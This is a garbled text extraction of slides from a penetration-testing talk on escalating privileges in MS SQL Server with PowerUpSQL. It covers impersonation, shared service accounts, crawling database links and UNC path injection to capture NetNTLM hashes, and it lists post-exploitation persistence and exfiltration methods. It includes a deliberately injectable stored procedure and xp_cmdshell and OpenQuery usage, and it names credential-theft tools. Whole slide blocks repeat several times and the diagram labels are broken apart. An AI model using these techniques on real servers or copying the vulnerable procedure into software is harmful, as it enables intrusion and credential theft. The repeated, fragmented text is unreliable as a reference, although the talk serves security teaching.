Speaker Information (2)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
